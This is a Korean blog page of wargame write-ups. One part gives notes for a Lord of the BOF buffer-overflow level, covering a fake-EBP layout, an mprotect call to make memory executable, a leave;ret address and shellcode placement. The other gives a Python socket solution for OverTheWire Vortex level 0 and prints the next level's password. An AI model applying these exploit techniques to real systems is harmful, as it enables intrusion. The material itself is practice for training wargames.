아래는 풀면서 노트한 내용입니다

 

stdin+500으로 fake ebp

stdin = 0xf6ffe000

stdin+500 mprotect (0x714670)
stdin+504 0xf6ffe258
stdin+508 &stdin  (0xf6ffe000)
stdin+512 len  (0x00000800)
stdin+516 prot  (0x00000007)

stdin+600(0xf6ffe258) nop+shellcode

leaveret 0x8048638

mprotect(&stdin, 2048, 7);
 

 

신고

'워게임 > Lord Of the BOF' 카테고리의 다른 글

dark_stone -> cruel  (0) 2013.10.15
evil_wiard -> dark_stone  (0) 2013.10.15
hell_fire -> evil_wizards  (1) 2013.10.12
dark_eyes -> hell_fire  (0) 2013.10.10

설정

트랙백

댓글

level0 -> level1

워게임/vortex 2013.09.29 23:36
크리에이티브 커먼즈 라이선스
Creative Commons License

 

import struct
from socket import *
p = lambda x : struct.pack("<Q", x)
up = lambda x : struct.unpack("<L", x)
host = "vortex.labs.overthewire.org"
port = 5842
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
a,b,c,d = up(s.recv(4))+up(s.recv(4))+up(s.recv(4))+up(s.recv(4))
s.send(p(a+b+c+d))
print s.recv(512)
 

 

Username: vortex1 Password: Gq#qu3bF3 

 

신고

'워게임 > vortex' 카테고리의 다른 글

vortex10 -> vortex11  (3) 2014.05.22
level0 -> level1  (0) 2013.09.29

설정

트랙백

댓글


티스토리 툴바